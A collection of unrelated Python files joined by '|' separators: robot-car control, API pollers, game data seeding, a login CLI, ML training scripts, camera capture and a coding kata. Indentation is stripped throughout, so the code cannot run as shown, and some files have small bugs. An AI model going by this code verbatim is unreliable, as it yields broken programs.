light = LED_detect(image)
if light==2:
STOP = True
else:
STOP = False
print("light: ", light)
def DISframe():
global STILL
try:
while True:
dis = round(ul.get_distance(), 2)
# print("dis: ", dis)
if dis < 20:
STILL = True
else:
STILL = False
except KeyboardInterrupt:
GPIO.cleanup()
def ROSframe():
global STOP
global STILL
try:
while True:
left, right, nl, nr = inf.detect()
GO = (not STOP) and (not STILL)
ros((left, right, nl, nr), car, GO)
except KeyboardInterrupt:
GPIO.cleanup()
if __name__ == '__main__':
global STOP
global STILL
STOP = False
STILL = False
t_LED = threading.Thread(target = LEDframe, args=() )
t_DIS = threading.Thread(target = DISframe, args=() )
t_ROS = threading.Thread(target = ROSframe, args=() )
threads = [t_ROS, t_LED, t_DIS]
v1, v2 = 60, 60
car.set_speed(v1, v2)
try:
for t in threads:
t.start()
except KeyboardInterrupt:
GPIO.cleanup()
|
#! python3
import GetFromAPI
import MyYouTubeDB
import threading
import datetime
def MainRoutine():
# Run the process every N seconds
Timer = 60.0
threading.Timer(Timer, MainRoutine).start() # called every minute
Key = 'YOUTUBE-API-KEY'
SelectedMethodNumList = [1, 6]
SelectedUserNameList = ["Pewdiepie", "LifeAccordingToJimmy", "jasonjason1124"]
YouTubeData = GetFromAPI.GetYouTubeData(SelectedMethodNumList, SelectedUserNameList, Key)
if (-1 != MyYouTubeDB.StoreToDB(YouTubeData, 'StorageDB')):
print(("%s : Data collection process Successed") % datetime.datetime.now().replace(microsecond=0).isoformat(' '))
else:
print(("%s : Data collection process Failed") % datetime.datetime.now().replace(microsecond=0).isoformat(' '))
def main():
MainRoutine()
if __name__ == "__main__":
main()
|
from apps.items.models import *
from apps.inventory.models import *
def add_ship_values():
ShipValues.objects.create(
travel_time_multiplier = 5.0,
travel_cost = 20,
)
def add_rookie():
ShipTemplate.objects.create(
ship_type = ShipTemplate.ROOKIE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 600,
hitpoints_max = 600,
armor_min = 80,
armor_max = 80,
weapons_min = 2,
weapons_max = 2,
#travel stats
warp_min = 3,
warp_max = 3,
enter_warp_min = 20,
enter_warp_max = 20,
travel_modifier_min = 1.00,
travel_modifier_max = 1.00,
dock_min = 60,
dock_max = 60,
cargo_space_min = 10,
cargo_space_max = 10,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.30,
)
def add_frigate():
ShipTemplate.objects.create(
ship_type = ShipTemplate.FRIGATE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 600,
hitpoints_max = 900,
armor_min = 100,
armor_max = 220,
weapons_min = 2,
weapons_max = 3,
#travel stats
warp_min = 3.00,
warp_max = 5.00,
enter_warp_min = 13,
enter_warp_max = 18,
travel_modifier_min = 0.80,
travel_modifier_max = 1.00,
dock_min = 40,
dock_max = 60,
cargo_space_min = 10,
cargo_space_max = 20,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.50,
)
def add_frigate_t2():
ShipTemplate.objects.create(
ship_type = ShipTemplate.FRIGATE,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_2,
hitpoints_min = 800,
hitpoints_max = 1100,
armor_min = 180,
armor_max = 300,
weapons_min = 2,
weapons_max = 4,
#travel stats
warp_min = 4.00,
warp_max = 6.00,
enter_warp_min = 10,
enter_warp_max = 15,
travel_modifier_min = 0.80,
travel_modifier_max = 1.10,
dock_min = 30,
dock_max = 50,
cargo_space_min = 15,
cargo_space_max = 25,
smuggle_bay_min = 0.45,
smuggle_bay_max = 0.80,
)
def add_destroyer_t1():
ShipTemplate.objects.create(
ship_type = ShipTemplate.DESTROYER,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_1,
hitpoints_min = 700,
hitpoints_max = 1000,
armor_min = 200,
armor_max = 300,
weapons_min = 3,
weapons_max = 4,
#travel stats
warp_min = 3.00,
warp_max = 5.00,
enter_warp_min = 15,
enter_warp_max = 20,
travel_modifier_min = 1.10,
travel_modifier_max = 1.40,
dock_min = 45,
dock_max = 75,
cargo_space_min = 15,
cargo_space_max = 30,
smuggle_bay_min = 0.30,
smuggle_bay_max = 0.50,
)
def add_destroyer_t2():
ShipTemplate.objects.create(
ship_type = ShipTemplate.DESTROYER,
size = ShipTemplate.SMALL,
tier = ShipTemplate.TIER_2,
hitpoints_min = 900,
hitpoints_max = 1200,
armor_min = 250,
armor_max = 350,
weapons_min = 3,
weapons_max = 5,
#travel stats
warp_min = 3.50,
warp_max = 5.50,
enter_warp_min = 13,
enter_warp_max = 17,
travel_modifier_min = 1.10,
travel_modifier_max = 1.40,
dock_min = 35,
dock_max = 65,
cargo_space_min = 20,
cargo_space_max = 35,
smuggle_bay_min = 0.45,
smuggle_bay_max = 0.80,
)
add_ship_values()
add_rookie()
add_frigate()
add_frigate_t2()
add_destroyer_t1()
add_destroyer_t2()
|
"""
This prototype application is available under the terms of GPLv3
Permission for other licences can and probably will be granted
if emailed at antimatter15@gmail.com.
"""
import httplib
import pickle
import urllib
import json
from optparse import OptionParser
waveid = "googlewave.com!w+Mu9eK7j2H"
parser = OptionParser(usage="usage: %prog [options] waveid")
parser.add_option("-r", "--raw",action="store_true", dest="raw",help="include raw JSON")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose",help="verbose")
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error("incorrect number of arguments")
exit()
elif args[0] == "default":
pass #yay do nothin
else:
waveid = urllib.unquote(urllib.unquote(args[0]))
if "+" not in waveid:
waveid = "w+"+waveid
if "!" not in waveid:
waveid = "googlewave.com!"+waveid
conn = httplib.HTTPSConnection("wave.google.com")
state = pickle.load(open("state.txt","r"))
session = state['session']
cookie = state['cookie']
url = "/wave/wfe/fetch/"+waveid+"/"+str(session)+"?v=3"
conn.request("GET", url, "", {"Cookie": "WAVE="+cookie})
r2 = conn.getresponse()
print r2.status, r2.reason, r2.version
wavejson = r2.read()[5:]
if options.raw:
print wavejson
exit()
wave = json.loads(wavejson)
bliplist = wave['1'][0]['1']['2']
#print bliplist
for b in bliplist:
if b['1'] == "conversation" or 'attach+' in b['1'] or 'spell+' in b['1']:
continue
print "--------------------------------------------"
print "| blip",b['1'],",".join(b['7'])
print "--------------------------------------------"
if '16' in b:
data = b['16']['2']
out = ""
for point in data: #...makes a beautiful line
if '2' in point:
out += point['2']
elif '4' in point:
out += "\n"
try:
print out.strip()
except UnicodeEncodeError:
print "Error Encoding Blip includes Non ASCII Character"
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
def cloud_fraction(mask):
"""
Compute metric(s) for a single field
Parameters
----------
field : numpy array of shape (npx,npx) - npx is number of pixels
(cloud) mask field.
Returns
-------
cf : float
cloud fraction.
"""
return np.count_nonzero(mask) / mask.size
|
# The point of writing super() is to ensure that the next method in line
# in the method resolution order (MRO) is called, which becomes important
# in multiple inheritance
# Note: super() can only be called if an ancestor inherits object eventually
class Base(object):
def __init__(self):
print("Base init'ed")
class ChildA(Base):
def __init__(self):
print("ChildA init'ed")
Base.__init__(self)
class ChildB(Base):
def __init__(self):
print("ChildB init'ed")
super(ChildB, self).__init__()
class UserDependency(Base):
def __init__(self):
print("UserDependency init'ed")
super(UserDependency, self).__init__()
class UserA(ChildA, UserDependency):
def __init__(self):
print("UserA init'ed")
super(UserA, self).__init__()
class UserB(ChildB, UserDependency):
def __init__(self):
print("UserB init'ed")
super(UserB, self).__init__()
UserA() # UserDependency never gets called because ChildA does not use super()
UserB() # UserDependency gets called before Base
|
import torch
import torch.nn
import os
import numpy as np
import matplotlib.pyplot as plt
import glob
import math
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix
from sklearn import preprocessing
from joblib import dump, load
from torchvision.transforms import ToTensor
from PIL import Image
from PIL import ImageFilter
from PIL import ImageOps
import face_to_hair
# import pretrained model:
from facenet_pytorch import InceptionResnetV1
def train_model(X_train, X_test, y_train, y_test, classes, model, model_name):
X_train = np.array(X_train)
y_train = np.array(y_train)
X_test = np.array(X_test)
y_test = np.array(y_test)
model.fit(X_train, y_train)
# test SVC + plot confusion matrix
plot_confusion_matrix(model, X_test, y_test)
plt.show()
# save model
if input('Save model? (y/n)') == 'y':
dump(model.best_estimator_, model_name + '.joblib')
def main():
# claases
hair_colors = ['light', 'dark']
color_to_num = lambda c: hair_colors.index(c)
# load pretrained face recognition model
resnet = InceptionResnetV1(pretrained='vggface2').eval()
# load data
path = os.path.dirname(os.path.realpath(__file__)) + '/faces/'
face_to_emb = {}
faces = []
colors = []
for i in range(1,21):
face = 'face_' + str(i)
embeddings = []
color = face_to_hair.color[face]
faces.append(face)
colors.append(color_to_num(color))
for file in glob.glob(path + face + '/*'):
img = Image.open(file)
img = img.resize((160, 160))
img2 = img.filter(ImageFilter.GaussianBlur(radius=1))
img = ToTensor()(img)
img2 = ToTensor()(img2)
# calculate embeddings
img_embedding = resnet(img.unsqueeze(0))
embeddings.append(img_embedding.detach().numpy().ravel())
img_embedding = resnet(img2.unsqueeze(0))
embeddings.append(img_embedding.detach().numpy().ravel())
face_to_emb[face] = embeddings
print(colors)
get_num_emb = lambda f: len(face_to_emb[f])
unnest_list = lambda l: [x for sub in l for x in sub]
# train SVC on embeddings
print('training SVC')
tuned_parameters = [{'kernel': ['linear'], 'C': [1, 10, 100, 1000]}]
model_SVC = GridSearchCV(SVC(), tuned_parameters, verbose=1)
# train k-NN on embeddings
grid_params = {
'n_neighbors' : [1,3,5,11,19],
'weights' : ['distance']
}
model_kNN = GridSearchCV(
KNeighborsClassifier(),
grid_params,
verbose=1
)
faces_train, faces_test, _, _ = train_test_split(
faces, colors, stratify=colors, test_size=0.25
)
X_train = [f for f_t in faces_train for f in face_to_emb[f_t]]
X_test = [f for f_t in faces_test for f in face_to_emb[f_t]]
y_train = [[color_to_num(face_to_hair.color[f])] * get_num_emb(f) for f in faces_train]
y_train = unnest_list(y_train)
y_test = [[color_to_num(face_to_hair.color[f])] * get_num_emb(f) for f in faces_test]
y_test = unnest_list(y_test)
train_model(X_train, X_test, y_train, y_test, hair_colors, model_SVC, 'hair_color_recog')
train_model(X_train, X_test, y_train, y_test, hair_colors, model_kNN, 'hair_color_recog')
if __name__ == '__main__':
main()
|
"""Operate on pages in manual; extract data from zones and print to examination file."""
from operator import itemgetter
import xmlStaticOperators
import xmlChildSearch
import xmlTableZoneExpander
import os
class xmlTableIdentifier(object):
"""
Identify two-column pages, search them for table zones and textzones that
appear to be falsely zoned. Trigger sub-classes to extract data or operate further.
Attributes:
year: string value for manual year.
out_path: incoming out path for saved data.
zones_dictionary: incoming zone data dictionary object.
page_data: incoming page data dictionary object.
line_data: income line data dictionary object.
table_aggregate_data: counter and modified table data used at for higher level classes.
"""
def __init__(self, year, data_out_path, manual_zones_dictionary, page_data, line_data):
self.year = '19' + year
self.out_path = data_out_path
self.zones_dictionary = manual_zones_dictionary
self.page_data = page_data
self.line_data = line_data
self.create_manual_directory()
self.table_aggregate_data = self.identify_tables()
self.recursive_empty_directory_clean()
def create_manual_directory(self):
"""Create save directory for page zone data."""
xmlStaticOperators.clear_destination(self.out_path)
os.mkdir(self.out_path)
def recursive_empty_directory_clean(self):
"""Clean out empty directories to avoid saving conflicts."""
for root, dirnames, filenames in os.walk(self.out_path, topdown = False):
for dir in dirnames:
try:
os.rmdir(os.path.join(root, dir))
except:
pass
@staticmethod
def manual_begin_end(year, page_index):
"""Define beginning and endpoints of manual in terms of areas to search."""
manual_begin_end_dict = {
'1920': [[-1, False], [133, True], [1513, False]],
'1921': [[-1, False], [158, True], [1751, False]],
'1922': [[-1, False], [193, True], [2077, False]],
'1923': [[-1, False], [159, True], [2414, False]],
'1924': [[-1, False], [310, True], [2878, False]],
'1925': [[-1, False], [225, True], [2405, False]],
'1926': [[-1, False], [270, True], [2665, False]],
'1927': [[-1, False], [306, True], [3057, False]],
'1928': [[-1, False], [348, True], [3425, False]],
'1929': [[-1, False], [391, True], [3485, False]]
}
# Identify nearest neighbour to page ID based on above dictionary;
# subtract bounds above from page index and find smallest non-zero value.
difference_list = sorted([[item, page_index - item[0]] for item in
manual_begin_end_dict[year] if page_index - item[0] > 0],
key=itemgetter(1))
begin_end_value = difference_list[0][0][1]
return begin_end_value
def create_page_directory(self, page):
"""Create save directory for page zone data."""
# slice page path string and reconstruct for output (both dir. and filename).
output_directory_fiche = page[-9:-5]
output_directory_fiche_path = os.path.join(self.out_path, output_directory_fiche)
if not os.path.exists(output_directory_fiche_path):
os.mkdir(output_directory_fiche_path)
output_directory_page = page[-4:]
return (output_directory_fiche_path, output_directory_fiche, output_directory_page)
def define_column_width(self, page):
"""Define width of columns against which to measure tables."""
page_columns = len(self.line_data[page][:-1][0].keys())
page_data = self.page_data[page]
if page_columns == 1:
column_width = page_data.page_width
elif page_columns == 2:
column_width = page_data.page_width / 2
elif page_columns == 3:
column_width = page_data.page_width / 3
return (page_columns, column_width)
def define_content_height(self, page):
"""Identify top of page content"""
# define in-function inputs.
column_top_dict = {}
column_bottom_dict = {}
line_data = self.line_data[page][0]
top_average = 0
bottom_average = 0
# loop through columns on page and define highest and lowest lines.
for index, column in line_data.items():
# define list of word objects in each line respectively.
top_row = column[max(column)]
bottom_row = column[min(column)]
# define highest high and lowest low of top and bottom rows.
column_top = max([word[1] for word in top_row])
column_bottom = min([word[1] for word in bottom_row])
# add column values to average top/bottom aggregates.
top_average += column_top
bottom_average += column_bottom
# update top/bottom dicts with top/bottom values for column.
column_top_dict.update({index: column_top})
column_bottom_dict.update({index: column_bottom})
# take averages of the column tops and bottoms to define rough page values.
top_average = top_average / len(column_top_dict) + .005
bottom_average = bottom_average / len(column_bottom_dict) - .015
return (column_top_dict, column_bottom_dict, top_average, bottom_average)
def identify_tables(self):
"""Identify tableZones from collective zone data; trigger stripping class."""
# define counters and object(s) to be returned.
manual_fullwidth_table_count = 0
manual_fullwidth_ideal_table_count = 0
table_keys_aggregate = []
modified_pages = {}
# loop through all pages in manual and trigger appropriate submodule operations.
for i, (page, data) in enumerate(self.zones_dictionary.items()):
# return T or F value for whether this page should be operated upon.
manual_operate_key = xmlTableIdentifier.manual_begin_end(self.year, i)
if manual_operate_key:
# run above-defined functions and link returned objects to new locals.
output_directory_data = self.create_page_directory(page)
page_column_data = self.define_column_width(page)
define_content_height = self.define_content_height(page)
columns = page_column_data[0]
column_width = page_column_data[1]
top_average = define_content_height[2]
bottom_average = define_content_height[3]
# determine 2-column pages; if True, trigger further conditions.
if columns > 1:
# loop through zones on page; define zone width and filter on zone type.
for zone in data:
zone_width = zone[2] - zone[4]
if zone[0] == 'tableZone':
# check if zone is column-width or a fraction thereof.
if column_width - .015 < zone_width < column_width + .03:
manual_fullwidth_table_count += 1
# define the ElementTree object from the zone object.
zone_element = zone[5]
# trigger class to ID whether the table structure is clean or not.
element_data = xmlChildSearch.xmlChildSearch(output_directory_data,
zone_element)
if element_data.clean_table:
manual_fullwidth_ideal_table_count += 1
for key in element_data.table_keys:
table_keys_aggregate.append(key)
# check if zone is partial-width and that it is within text bounds
# defined by self.define_content_height.
if (zone_width < column_width - .015 and zone[3] > bottom_average and
(zone[1] < top_average or zone[3] < top_average) and
(zone[0] == 'tableZone' or zone[0] == 'textZone')):
# check if a previous zone on this page has been modified. If yes,
# continue with the zones dictionary value from the updated dict.
# This will include the expanded zone that has been previously modified
# as well as no longer having removed zones to eliminate duplicating work.
if page in modified_pages.keys():
data = modified_pages[page][1]
# if zone has been deleted, skip loop iteration.
if zone not in data:
continue
# trigger xmlTableZoneExpander class and define output.
modified_page = xmlTableZoneExpander.xmlTableZoneExpander(page, self.page_data[page],
columns, output_directory_data,
zone, data, define_content_height)
# Mirror and update modified pages dict as similar to original page zone dicitionary.
# (will be used to print page PDFs of only pages with modified / updated zones).
page_data = self.page_data[page]
modified_pages.update({page:[[page_data.page_dimensions[0],
page_data.page_dimensions[1]],
modified_page.page_zone_data]})
return(manual_fullwidth_table_count, manual_fullwidth_ideal_table_count, table_keys_aggregate, modified_pages)
|
import re
from getpass import getpass
from users import check_password, encrypt_password, Users, Logs
class InvalidAction(Exception):
pass
class MaxTries(Exception):
pass
class Interface:
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
NUM_TRIES = 3
def __init__(self, users: Users, logs: Logs) -> None:
# Connect to Database tables for users and logs
self.users = users
self.logs = logs
# Logged out by default
self.email = ""
self.id = None
self._set_actions()
self._set_options()
def register(self) -> None:
if self._is_loggedin():
raise InvalidAction("A logged in user can not register.")
for _ in range(self.NUM_TRIES):
try:
email = self._get_email()
# DB validation
query = self.users.read_user(email=email)
assert not query, "Email already in use.\n"
hashedPassword = self._new_password()
self.users.create_user(email=email, password=hashedPassword)
break
except AssertionError as msg:
print(msg)
else:
raise MaxTries("Max attempts exceeded, please try again later.\n")
print("\nYour account has been created.\n")
self._send_activation_email(email=email)
def login(self) -> None:
if self._is_loggedin():
raise InvalidAction("Already logged in.")
for _ in range(self.NUM_TRIES):
try:
email = self._get_email()
# DB email validation
query = self.users.read_user(email=email)
assert query, "Email address not found.\n"
# Check if account is blocked
assert not self.users.is_locked(
email
), "\nThe account is blocked for now.\n"
# Check if password matches
success = self._authenticate(query["password"])
# Register in logs database
self.logs.create_log(success, query["id"])
if success:
break
else:
print("Wrong password.\n")
if self.logs.failed_attempts(query["id"]) > 4:
"\nThe account will be blocked for 30 minutes.\n"
self.users.lock_user(email=email)
except AssertionError as msg:
print(msg)
else:
raise MaxTries("Max attempts exceeded. Try again later.\n")
self._loggedin(email=email, id=query["id"])
def print_log(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to check your log.")
print("\nAccess time, Authentication success")
for log in self.logs.read_log(self.id):
print(log)
def change_email(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to change your email.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
newEmail = self._get_email()
newQuery = self.users.read_user(email=newEmail)
assert not newQuery, "Email already in use.\n"
self.users.update_email(id=self.id, email=newEmail)
self.email = newEmail
print(f"\nYour email has been changed to {newEmail}.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
def change_password(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to change your password.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
hashedPassword = self._new_password()
self.users.update_password(id=self.id, password=hashedPassword)
print("\nYour password has been changed.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
def logout(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to log out.")
self._loggedout()
def delete_account(self) -> None:
if not self._is_loggedin():
raise InvalidAction("You must be logged in to delete your account.")
query = self.users.read_user(email=self.email)
success = self._authenticate(query["password"])
if success:
try:
self.users.delete_user(id=self.id)
self.logs.delete_userlog(user_id=self.id)
print("\nYour account and related data have been deleted.\n")
except AssertionError as msg:
print(msg)
else:
print("Wrong password.\n")
self.logout()
def _new_password(self) -> str:
password = getpass("\nPlease enter the new password: ")
password_re = getpass("Please retype the new password: ")
self.validate_password(password, password_re)
return encrypt_password(password)
def _get_email(self) -> str:
email = input("\nPlease enter a valid email address: ")
self.validate_email(email)
return email
def _authenticate(self, password: str) -> bool:
input = getpass("Please enter your password: ")
return check_password(input, password)
def _generate_confirmation_token(self) -> None:
"""Generates confirmation token
ideally within a web framework such as Django or Flask,
or secrets.token_urlsafe() from the standard lib"""
pass
def _send_activation_email(self, email: str) -> None:
"""Sends email to specified address, with a generated confirmation token.
Possible implementation using libraries smtplib, email
"""
print("\n**Email with an activation link would have been sent now.**\n")
def _is_loggedin(self) -> bool:
return bool(self.email)
def _loggedin(self, email: str, id: int) -> None:
self.email = email
self.id = id
self._set_actions()
self._set_options()
print("You are logged in.\n")
def _loggedout(self) -> None:
self.email = ""
self.id = None
self._set_actions()
self._set_options()
print("You have been logged out.\n")
def _set_options(self) -> None:
if self._is_loggedin():
self.options = {
"1": "Print log",
"2": "Change email",
"3": "Change password",
"4": "Log out",
"5": "Delete account",
}
else:
self.options = {"1": "Register", "2": "Login"}
def _set_actions(self) -> None:
if self._is_loggedin():
self.actions = {
"Print log": self.print_log,
"Change email": self.change_email,
"Change password": self.change_password,
"Log out": self.logout,
"Delete account": self.delete_account,
}
else:
self.actions = {"Register": self.register, "Login": self.login}
@classmethod
def validate_email(cls, email: str) -> None:
msg = "Invalid email address. Try x@x.x, where 'x' can be any alphanumeric char.\n"
assert cls.EMAIL_REGEX.fullmatch(email), msg
@classmethod
def validate_password(cls, pw1: str, pw2: str) -> None:
assert pw1 == pw2, "Passwords must match.\n"
|
import csv
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.preprocessing.image import img_to_array, load_img
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
# Constants
steering_offset = 0.3
data_path = "data/"
# Load the data and offset the steering on left and right images.
def get_image_path_and_labels(data_file):
img_paths, steering_angles = [], []
with open(data_file) as fin:
skip_next_entry = True
for center_img, left_img, right_img, steering_angle, throttle, break_power, speed in csv.reader(fin):
# The first entry is just the header so skip it.
if skip_next_entry:
skip_next_entry = False
continue
# Add the center, left, and right images paths.
img_paths += [center_img.strip(), left_img.strip(), right_img.strip()]
# Append steering offset and add the angle.
steering_angles += [float(steering_angle), float(steering_angle) + steering_offset, float(steering_angle) - steering_offset]
return img_paths, steering_angles
# Process the image
def process_image(image_path, steering_angle):
# Compress the size to 100x100 so we can train faster.
image = load_img(image_path, target_size=(100,100,3))
image = img_to_array(image)
return image, steering_angle
# Generator
def generator(batch_size, x, y):
while 1:
batch_x, batch_y = [], []
for i in range(batch_size):
index = random.randint(0, len(x) - 1)
steering_angle = y[index]
image, steering_angle = process_image(data_path + x[index], steering_angle)
batch_x.append(image)
batch_y.append(steering_angle)
# Also add to the batch a flipped version of the image.
image_flipped = np.fliplr(image)
steering_angle_flipped = -steering_angle
batch_x.append(image_flipped)
batch_y.append(steering_angle_flipped)
yield np.array(batch_x), np.array(batch_y)
# Define the training model.
def model(shape):
# We must use SAME padding so the output size isn't reduced too small before flattening the network.
border_mode = 'same'
model = Sequential()
# Normalize the input.
model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=shape, output_shape=shape))
model.add(Convolution2D(24, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(36, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(48, 5, 5, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Convolution2D(64, 3, 3, activation='relu', border_mode=border_mode))
model.add(MaxPooling2D())
model.add(Flatten())
model.add(Dense(1164, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.35))
model.add(Dense(10, activation='relu'))
model.add(Dense(1, activation='linear'))
model.compile(loss='mse', optimizer="adam")
return model
# Train the model.
def train():
net = model(shape=(100,100,3))
# Print the strucutre of the network
for layer in net.layers:
print(layer, layer.output_shape)
# Get the image paths, and steering angles.
x, y = get_image_path_and_labels(data_path + 'driving_log.csv')
# Shuffle the data.
x, y = shuffle(x, y, random_state=42)
# Split into training and validation sets.
x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.15, random_state=42)
# Train the model.
net.fit_generator(generator(64, x_train, y_train),
validation_data=generator(64, x_val, y_val),
nb_val_samples=12000,
samples_per_epoch=48000,
nb_epoch=3)
# Save the model.
net.save('model.h5')
# Activate this script
if __name__ == '__main__':
train()
|
class Player(object):
def __init__(self, player):
self.values = player
def __eq__(self,other):
return self.values == other.values
'''We don't need this method anymore'''
def getValidMoves(self, board):
return board.getValidMoves()
def makeMove(self, board, col):
return
|
import requests
import datetime # for unix UTC conversion
# COMPLEX WEATHER
def fullData():
# GET URL AND ENTER KEYS
key = input('Enter your API key: ')
location = input('Enter the location to search: ')
url = 'http://api.openweathermap.org/data/2.5/weather?q=' + location + '&appid=' + key
# LOAD DATA
r = requests.get(url)
response_dict = r.json()
location = response_dict['name']
country = response_dict['sys']['country']
latitude = response_dict['coord']['lat']
longitude = response_dict['coord']['lon']
weather = response_dict['weather'][0]['main']
weatherDesc = response_dict['weather'][0]['description']
temperature = response_dict['main']['temp']-273.16 # convert to Celcsius
maximum = response_dict['main']['temp_max']-273.16
minimum = response_dict['main']['temp_min']-273.16
humidity = response_dict['main']['humidity']
pressure = response_dict['main']['pressure']
cloudCover = response_dict['clouds']['all'] # in percentage
windspeed = response_dict['wind']['speed'] # in m/s
try:
windDir = response_dict['wind']['deg'] # in degrees
except KeyError:
windDir = 'no data'
sunrise = response_dict['sys']['sunrise'] # both of these in unix UTC
sunset = response_dict['sys']['sunset']
# DISPLAY DATA
print(location + ', ' + country)
print('Lat:', latitude)
print('Lon:', longitude)
print('\n' + weather + ', ' + weatherDesc)
print('Temp: %.2f' % temperature + '°C')
print('Max: %.2f' % maximum + '°C')
print('Min: %.2f' % minimum + '°C')
print('\nHumidity: %.2f' % humidity + '%')
print('Pressure: %.2f' % pressure + 'hPa')
print('Clouds: %.1f' % cloudCover + ' % cover')
print('Wind blowing %.2f ' % windspeed + 'm/s at bearing ' + str(windDir))
print('\nSunrise')
print(datetime.datetime.fromtimestamp(int(sunrise)).strftime('%H:%M:%S:%A'))
print('Sunset')
print(datetime.datetime.fromtimestamp(int(sunset)).strftime('%H:%M:%S:%A'))
def forcastDays():
key = input('Enter your API key: ')
location = input('Enter the location to search: ')
url = 'http://api.openweathermap.org/data/2.5/forecast/daily?q=' + location + '&cnt=5&mode=json&appid=' + key
days = int(input('How many days to forcast? (max. 16): '))
# LOAD DATA
r = requests.get(url)
response_dict = r.json()
# GET NUMBER OF DAYS
print(str(days) + '-day forcast for ' + response_dict['city']['name'] + ', ' + response_dict['city']['country'])
# RUN FOR LOOP BASED ON GIVEN DAYS
for i in range(days):
today = response_dict['list'][i]
# GET THE DAY BASED ON UNIX TIMESTAMP
print('\n' + datetime.datetime.fromtimestamp(today['dt']).strftime('%A'))
print(today['weather'][0]['main'] + ', ' + today['weather'][0]['description'])
print('Humidity: ' + str(today['humidity']) + '%')
print('Cloud Cover: ' + str(today['clouds']) + '%')
print('The wind is blowing at ' + str(today['speed']) + 'm/s at bearing ' + str(today['deg']))
print('Max: %.2f' % (float((today['temp']['max'])-273.16)) + '°C')
print('Min: %2.f' % (float((today['temp']['min'])-273.16)) + '°C')
# USER CHOICE
print('Would you like weather or a forcast?')
userChoice = int(input('1: Weather 2: Forcast \n>> '))
if userChoice == 1:
fullData()
elif userChoice == 2:
forcastDays()
else:
print('Invalid input!')
|
#!/usr/bin/env python3
import asi
import numpy as np
import cv2
def main():
print('Warning: No checking for error return codes!')
asi.ASIGetNumOfConnectedCameras()
rtn, info = asi.ASIGetCameraProperty(0)
frame_size = info.MaxWidth * info.MaxHeight
asi.ASIOpenCamera(info.CameraID)
asi.ASIInitCamera(info.CameraID)
asi.ASISetROIFormat(info.CameraID, info.MaxWidth, info.MaxHeight, 1, asi.ASI_IMG_RAW8)
asi.ASISetControlValue(info.CameraID, asi.ASI_BANDWIDTHOVERLOAD, 94, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_HIGH_SPEED_MODE, 1, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_EXPOSURE, 16667, asi.ASI_FALSE)
asi.ASISetControlValue(info.CameraID, asi.ASI_GAIN, 100, asi.ASI_FALSE)
asi.ASIStartVideoCapture(info.CameraID)
cv2.namedWindow('video', cv2.WINDOW_NORMAL)
cv2.resizeWindow('video', 640, 480)
frame_count = 0
while True:
dropped_frame_count = asi.ASICheck(asi.ASIGetDroppedFrames(info.CameraID))
print(f'frame {frame_count:06d}, dropped: {dropped_frame_count:06d}')
(rtn, frame) = asi.ASIGetVideoData(info.CameraID, frame_size, 0)
if frame_count % 4 == 0:
frame = np.reshape(frame, (info.MaxHeight, info.MaxWidth))
frame = cv2.cvtColor(frame, cv2.COLOR_BAYER_BG2BGR)
cv2.imshow('video', frame)
cv2.waitKey(1)
frame_count += 1
if __name__ == "__main__":
main()
|
def max_gap(numbers):
nums = sorted(numbers)
gap = 0
for i,n in enumerate(nums[:-1]):
subt = abs(nums[i+1] - n)
if gap < subt: gap = subt
return gap
'''
Task
Given an array/list [] of integers , Find The maximum difference between the
successive elements in its sorted form.
Notes
Array/list size is at least 3 .
Array/list's numbers Will be mixture of positives and negatives also zeros_
Repeatition of numbers in the array/list could occur.
The Maximum Gap is computed Regardless the sign.
Input >> Output Examples
1- maxGap ({13,10,5,2,9}) ==> return (4)
Explanation:
The Maximum Gap after sorting the array is 4 , The difference between 9 - 5 = 4 .
2- maxGap ({-3,-27,-4,-2}) ==> return (23)
Explanation:
The Maximum Gap after sorting the array is 23 , The difference between |-3- (-27) | = 23 .
Note : Regardless the sign of negativity .
3- maxGap ({-7,-42,-809,-14,-12}) ==> return (767)
Explanation:
The Maximum Gap after sorting the array is 767 , The difference between | -809- (-42) | = 767 .
Note : Regardless the sign of negativity .
4- maxGap ({-54,37,0,64,640,0,-15}) //return (576)
Explanation:
The Maximum Gap after sorting the array is 576 , The difference between | 64 - 640 | = 576 .
Note : Regardless the sign of negativity .
'''
|
#!/usr/bin/python
"""
**********************************************************************************************************************************************************
